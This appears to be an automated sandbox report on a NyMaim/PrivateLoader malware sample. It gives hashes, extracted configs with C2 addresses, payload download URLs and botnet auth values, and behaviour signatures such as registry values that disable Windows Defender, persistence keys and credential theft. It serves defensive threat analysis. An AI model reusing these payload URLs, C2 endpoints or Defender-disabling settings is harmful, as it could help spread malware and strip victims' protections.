nymaim | 095f17776f1ee705ba750fd0093e09ea81b1f9f29b9485ffc825fa2b48b9c664

Analysis

max time kernel
604s
max time network
609s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
02-08-2022 12:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

File.exe
Size

399.1MB
MD5

da68a47812b9fc6d8f58bc98503c55f9
SHA1

22f68cb818335552220eea6a38498f4688c7ea0a
SHA256

1d7c6b200ac9d76d30f825ecbdc9be885ce7698cef93c39f1fa2753eead4389b
SHA512

ee8535fa38381942124851abc10ebbef9e29fcee7f65b6709c21348cc4c7bc88ae71adf2ef5715796a5cdc02e62809fc67565ce72b112373033008bfb73ea713

Malware Config

Extracted

Family

privateloader

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

http://163.123.143.4/proxies.txt

http://107.182.129.251/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

163.123.143.12

Attributes

payload_url
https://cdn.discordapp.com/attachments/1003879548242374749/1003976870611669043/NiceProcessX64.bmp

https://cdn.discordapp.com/attachments/1003879548242374749/1003976754358124554/NiceProcessX32.bmp

https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp

https://c.xyzgamec.com/userdown/2202/random.exe

http://193.56.146.76/Proxytest.exe

http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

http://privacy-tools-for-you-780.com/downloads/toolspab3.exe

http://luminati-china.xyz/aman/casper2.exe

https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe

http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe

https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp

https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp

https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp

http://185.215.113.208/ferrari.exe

https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp

https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp

https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp

https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp

https://c.xyzgamec.com/userdown/2202/random.exe

http://mnbuiy.pw/adsli/note8876.exe

http://www.yzsyjyjh.com/askhelp23/askinstall23.exe

http://luminati-china.xyz/aman/casper2.exe

https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe

http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe

https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe

https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe

https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe

https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe

https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Extracted

Family

redline

Botnet

perff

95.216.35.135:39090

Attributes

auth_value
2989c8de2bb75fd21ba56108f960d9e5

Extracted

Family

nymaim

208.67.104.9

212.192.241.16

Extracted

Family

redline

Botnet

Lyla02.08

185.215.113.216:21921

Attributes

auth_value
9cb9dfd8254fea9086254ee7db241c3f

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @mr_golds)

193.233.193.14:8163

Attributes

auth_value
4b2de03af6b6ac513ac597c2e6c1ad51

Extracted

Family

redline

Botnet

build1kf

194.113.106.21:41676

Attributes

auth_value
6ee2756e01e2452a943a0f546ea55a3b

Extracted

Family

raccoon

Botnet

125a9422607402ad773f580d72e3170b

http://91.242.229.142/

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

File.exeAFehaRtS3BjOsH98_ztZ9lt8.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	File.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	AFehaRtS3BjOsH98_ztZ9lt8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AFehaRtS3BjOsH98_ztZ9lt8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AFehaRtS3BjOsH98_ztZ9lt8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	AFehaRtS3BjOsH98_ztZ9lt8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	File.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	File.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	File.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	File.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AFehaRtS3BjOsH98_ztZ9lt8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	File.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	File.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AFehaRtS3BjOsH98_ztZ9lt8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AFehaRtS3BjOsH98_ztZ9lt8.exe

NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4200	2396	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	12572	2396	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	13896	2396	rundll32.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/293648-378-0x0000000000940000-0x000000000140F000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/289256-333-0x00000000002A0000-0x00000000002C0000-memory.dmp	family_redline
behavioral2/memory/292912-338-0x0000000000390000-0x00000000003B0000-memory.dmp	family_redline

YTStealer
YTStealer is a malware designed to steal YouTube authentication cookies.
stealer ytstealer

YTStealer payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2208-240-0x00000000006B0000-0x0000000001488000-memory.dmp	family_ytstealer

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

File.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ File.exe
Downloads MZ/PE file

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	File.exe

Executes dropped EXE 42 IoCs

Processes:

SiIPgffhsWTK3JkQj3G3Dvbk.exefF5ygF6zUL2j7BgJsrzMs5uw.exeFIkuzTxYq3Qh2B5p8XUzFJYh.exerIATXkJQsru8Qt6FouVAoJN9.exeMOcUEk3p_UWvUgsQoStIFBET.execIOJ5LuwWQ_mBOBhBsYIn9Yx.exefJlCTLIRnExfVX1w5lhVA2gM.exep8sYABJEPBKHsrWbuUMvuEmC.exe5aFFSxJwR1FBlcYUjSGidRlz.exedesuZ_fZh8gKzUyW4uNCIQWO.exe2PBNeHhnANFcZLXvOx2BhyvE.exe8GtwDL5uIPAGSf5Vw0_vTxoe.exeatNsZViDRuGwwYT8fGWcr69l.execjTIFcCkRDslD3Fg_jn_oj8q.exepKZvEDfQM4qhJ9covfP9c0w5.exeCKthxRkjQ9P0nPCB7pGm4sUU.exeALkiWtwf2N31vVqskVzdBiTO.exeCwA699rBCmpjgwId2ztJaClQ.exeSETUP_~2.EXE2PBNeHhnANFcZLXvOx2BhyvE.exeALkiWtwf2N31vVqskVzdBiTO.exeI56K7HK4MBG8EI8.exeH7L84LM088BFFC0.exeMGCBG29JHMLEMCF.exeH7L84LM088BFFC0.exeMGCBG29JHMLEMCF.exeL9DHF4E57EM6FKJ.exe3I4KB8HIF4A6FDB.exeAFehaRtS3BjOsH98_ztZ9lt8.exeqUSkqDxwv5pK2AljqKezA8_U.exe2bbuEPPB53QlexKI3JihfMai.exeUodlXYKi7I0dvytNXNHpR0KN.execWH8_hZkX3caQW3M5iH8dIBW.exeDO8qwv8WmQADZonPHrsQethm.exentt4u_Lan_6I2ZANObizYNEn.exeIPtG_TrJWml7qL2EfECYeagN.exevTzqSbaejF2bhfghwnhyYmFb.exeInstall.exeInstall.exe9BF0.exeBD74.exeCA46.exe

pid	process
1448	SiIPgffhsWTK3JkQj3G3Dvbk.exe
3880	fF5ygF6zUL2j7BgJsrzMs5uw.exe
4256	FIkuzTxYq3Qh2B5p8XUzFJYh.exe
2208	rIATXkJQsru8Qt6FouVAoJN9.exe
2696	MOcUEk3p_UWvUgsQoStIFBET.exe
3488	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
2428	fJlCTLIRnExfVX1w5lhVA2gM.exe
4564	p8sYABJEPBKHsrWbuUMvuEmC.exe
2192	5aFFSxJwR1FBlcYUjSGidRlz.exe
4576	desuZ_fZh8gKzUyW4uNCIQWO.exe
3444	2PBNeHhnANFcZLXvOx2BhyvE.exe
4084	8GtwDL5uIPAGSf5Vw0_vTxoe.exe
5012	atNsZViDRuGwwYT8fGWcr69l.exe
2200	cjTIFcCkRDslD3Fg_jn_oj8q.exe
932	pKZvEDfQM4qhJ9covfP9c0w5.exe
4152	CKthxRkjQ9P0nPCB7pGm4sUU.exe
4580	ALkiWtwf2N31vVqskVzdBiTO.exe
2116	CwA699rBCmpjgwId2ztJaClQ.exe
1824	SETUP_~2.EXE
3472	2PBNeHhnANFcZLXvOx2BhyvE.exe
56308	ALkiWtwf2N31vVqskVzdBiTO.exe
61844	I56K7HK4MBG8EI8.exe
66812	H7L84LM088BFFC0.exe
71052	MGCBG29JHMLEMCF.exe
73120	H7L84LM088BFFC0.exe
75016	MGCBG29JHMLEMCF.exe
77744	L9DHF4E57EM6FKJ.exe
86244	3I4KB8HIF4A6FDB.exe
123748	AFehaRtS3BjOsH98_ztZ9lt8.exe
178220	qUSkqDxwv5pK2AljqKezA8_U.exe
201064	2bbuEPPB53QlexKI3JihfMai.exe
201072	UodlXYKi7I0dvytNXNHpR0KN.exe
201084	cWH8_hZkX3caQW3M5iH8dIBW.exe
202264	DO8qwv8WmQADZonPHrsQethm.exe
202172	ntt4u_Lan_6I2ZANObizYNEn.exe
208804	IPtG_TrJWml7qL2EfECYeagN.exe
208884	vTzqSbaejF2bhfghwnhyYmFb.exe
252448	Install.exe
293228	Install.exe
293648	9BF0.exe
4176	BD74.exe
5124	CA46.exe

Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exe

pid process

8448 netsh.exe
8336 netsh.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

12960 takeown.exe
13112 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
8448	netsh.exe
8336	netsh.exe

pid	process
12960	takeown.exe
13112	icacls.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\FIkuzTxYq3Qh2B5p8XUzFJYh.exe	upx
C:\Users\Admin\Pictures\Adobe Films\FIkuzTxYq3Qh2B5p8XUzFJYh.exe	upx
C:\Users\Admin\Pictures\Adobe Films\rIATXkJQsru8Qt6FouVAoJN9.exe	upx
C:\Users\Admin\Pictures\Adobe Films\rIATXkJQsru8Qt6FouVAoJN9.exe	upx
behavioral2/memory/4256-186-0x0000000000400000-0x0000000000C96000-memory.dmp	upx
behavioral2/memory/2208-197-0x00000000006B0000-0x0000000001488000-memory.dmp	upx
behavioral2/memory/4256-231-0x0000000000400000-0x0000000000C96000-memory.dmp	upx
behavioral2/memory/2208-240-0x00000000006B0000-0x0000000001488000-memory.dmp	upx
behavioral2/memory/201072-326-0x0000000000400000-0x0000000000C96000-memory.dmp	upx

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/5720-416-0x0000000140000000-0x000000014068C000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exeFile.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	File.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	File.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cIOJ5LuwWQ_mBOBhBsYIn9Yx.exeL9DHF4E57EM6FKJ.exedesuZ_fZh8gKzUyW4uNCIQWO.exeALkiWtwf2N31vVqskVzdBiTO.exeSETUP_~2.EXEAFehaRtS3BjOsH98_ztZ9lt8.exeInstall.exeFile.execjTIFcCkRDslD3Fg_jn_oj8q.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	L9DHF4E57EM6FKJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	desuZ_fZh8gKzUyW4uNCIQWO.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	ALkiWtwf2N31vVqskVzdBiTO.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	SETUP_~2.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	AFehaRtS3BjOsH98_ztZ9lt8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation	cjTIFcCkRDslD3Fg_jn_oj8q.exe

Loads dropped DLL 9 IoCs

Processes:

regsvr32.exerundll32.exerundll32.exerundll32.exeregsvr32.exe

pid	process
44896	regsvr32.exe
44896	regsvr32.exe
135292	rundll32.exe
142240	rundll32.exe
142240	rundll32.exe
293580	rundll32.exe
293580	rundll32.exe
3044	regsvr32.exe
3044	regsvr32.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

12960 takeown.exe
13112 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
12960	takeown.exe
13112	icacls.exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/3752-130-0x0000000000EC0000-0x00000000016A0000-memory.dmp	themida
behavioral2/memory/3752-131-0x0000000000EC0000-0x00000000016A0000-memory.dmp	themida
behavioral2/memory/3752-132-0x0000000000EC0000-0x00000000016A0000-memory.dmp	themida
behavioral2/memory/3752-133-0x0000000000EC0000-0x00000000016A0000-memory.dmp	themida
behavioral2/memory/3752-136-0x0000000000EC0000-0x00000000016A0000-memory.dmp	themida
behavioral2/memory/3752-200-0x0000000000EC0000-0x00000000016A0000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

cWH8_hZkX3caQW3M5iH8dIBW.exevTzqSbaejF2bhfghwnhyYmFb.exeatNsZViDRuGwwYT8fGWcr69l.exeMGCBG29JHMLEMCF.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	cWH8_hZkX3caQW3M5iH8dIBW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	cWH8_hZkX3caQW3M5iH8dIBW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	vTzqSbaejF2bhfghwnhyYmFb.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	atNsZViDRuGwwYT8fGWcr69l.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	atNsZViDRuGwwYT8fGWcr69l.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	MGCBG29JHMLEMCF.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	vTzqSbaejF2bhfghwnhyYmFb.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

File.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA File.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

296 ip-api.com
30 ipinfo.io
31 ipinfo.io
176 ipinfo.io
177 ipinfo.io
212 ipinfo.io
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

File.exe9BF0.exe

pid process

3752 File.exe
293648 9BF0.exe
293648 9BF0.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	File.exe

flow	ioc
296	ip-api.com
30	ipinfo.io
31	ipinfo.io
176	ipinfo.io
177	ipinfo.io
212	ipinfo.io

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

p8sYABJEPBKHsrWbuUMvuEmC.exe2PBNeHhnANFcZLXvOx2BhyvE.exeH7L84LM088BFFC0.exeMGCBG29JHMLEMCF.exefJlCTLIRnExfVX1w5lhVA2gM.exepKZvEDfQM4qhJ9covfP9c0w5.exe

description	pid	process	target process
PID 4564 set thread context of 2732	4564	p8sYABJEPBKHsrWbuUMvuEmC.exe	vbc.exe
PID 3444 set thread context of 3472	3444	2PBNeHhnANFcZLXvOx2BhyvE.exe	2PBNeHhnANFcZLXvOx2BhyvE.exe
PID 66812 set thread context of 73120	66812	H7L84LM088BFFC0.exe	H7L84LM088BFFC0.exe
PID 71052 set thread context of 75016	71052	MGCBG29JHMLEMCF.exe	MGCBG29JHMLEMCF.exe
PID 2428 set thread context of 289256	2428	fJlCTLIRnExfVX1w5lhVA2gM.exe	AppLaunch.exe
PID 932 set thread context of 292912	932	pKZvEDfQM4qhJ9covfP9c0w5.exe	AppLaunch.exe

Drops file in Program Files directory 2 IoCs

Processes:

desuZ_fZh8gKzUyW4uNCIQWO.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	desuZ_fZh8gKzUyW4uNCIQWO.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	desuZ_fZh8gKzUyW4uNCIQWO.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

10492 sc.exe
12252 sc.exe
12340 sc.exe
12452 sc.exe
12492 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
10492	sc.exe
12252	sc.exe
12340	sc.exe
12452	sc.exe
12492	sc.exe

Program crash 26 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
73100	3488	WerFault.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
135284	3488	WerFault.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
153532	135292	WerFault.exe	rundll32.exe
178212	3488	WerFault.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
292996	201064	WerFault.exe	2bbuEPPB53QlexKI3JihfMai.exe
293176	3488	WerFault.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
293536	201064	WerFault.exe	2bbuEPPB53QlexKI3JihfMai.exe
293568	3488	WerFault.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
292980	201064	WerFault.exe	2bbuEPPB53QlexKI3JihfMai.exe
5000	3488	WerFault.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
4772	201064	WerFault.exe	2bbuEPPB53QlexKI3JihfMai.exe
2312	3488	WerFault.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
5060	201064	WerFault.exe	2bbuEPPB53QlexKI3JihfMai.exe
4552	3488	WerFault.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
3024	2192	WerFault.exe	5aFFSxJwR1FBlcYUjSGidRlz.exe
2628	201064	WerFault.exe	2bbuEPPB53QlexKI3JihfMai.exe
1632	3488	WerFault.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
5160	4084	WerFault.exe	8GtwDL5uIPAGSf5Vw0_vTxoe.exe
5356	201064	WerFault.exe	2bbuEPPB53QlexKI3JihfMai.exe
5528	3488	WerFault.exe	cIOJ5LuwWQ_mBOBhBsYIn9Yx.exe
6156	5720	WerFault.exe	E0FC.exe
6284	201064	WerFault.exe	2bbuEPPB53QlexKI3JihfMai.exe
6824	201064	WerFault.exe	2bbuEPPB53QlexKI3JihfMai.exe
7028	6484	WerFault.exe	Ongrthqyalrtzimteamviewerportable_15_32_32.exe
12908	12608	WerFault.exe	rundll32.exe
13988	13908	WerFault.exe	rundll32.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

CwA699rBCmpjgwId2ztJaClQ.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CwA699rBCmpjgwId2ztJaClQ.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CwA699rBCmpjgwId2ztJaClQ.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CwA699rBCmpjgwId2ztJaClQ.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

125600 schtasks.exe
3036 schtasks.exe
3228 schtasks.exe
13224 schtasks.exe
1152 schtasks.exe
124872 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

12556 tasklist.exe
12532 tasklist.exe

pid	process
125600	schtasks.exe
3036	schtasks.exe
3228	schtasks.exe
13224	schtasks.exe
1152	schtasks.exe
124872	schtasks.exe

pid	process
12556	tasklist.exe
12532	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5568 taskkill.exe
8320 taskkill.exe
8860 taskkill.exe
14156 taskkill.exe

pid	process
5568	taskkill.exe
8320	taskkill.exe
8860	taskkill.exe
14156	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

3I4KB8HIF4A6FDB.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	3I4KB8HIF4A6FDB.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	3I4KB8HIF4A6FDB.exe
Key created	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Software\Microsoft\Internet Explorer\IESettingSync	3I4KB8HIF4A6FDB.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	3I4KB8HIF4A6FDB.exe

Modifies registry class 1 IoCs

Processes:

L9DHF4E57EM6FKJ.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings L9DHF4E57EM6FKJ.exe
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

14016 reg.exe
12792 reg.exe
12864 reg.exe
12932 reg.exe
13860 reg.exe
12600 reg.exe
12780 reg.exe
13960 reg.exe
14048 reg.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

13684 PING.EXE
13696 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 195 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings	L9DHF4E57EM6FKJ.exe

pid	process
14016	reg.exe
12792	reg.exe
12864	reg.exe
12932	reg.exe
13860	reg.exe
12600	reg.exe
12780	reg.exe
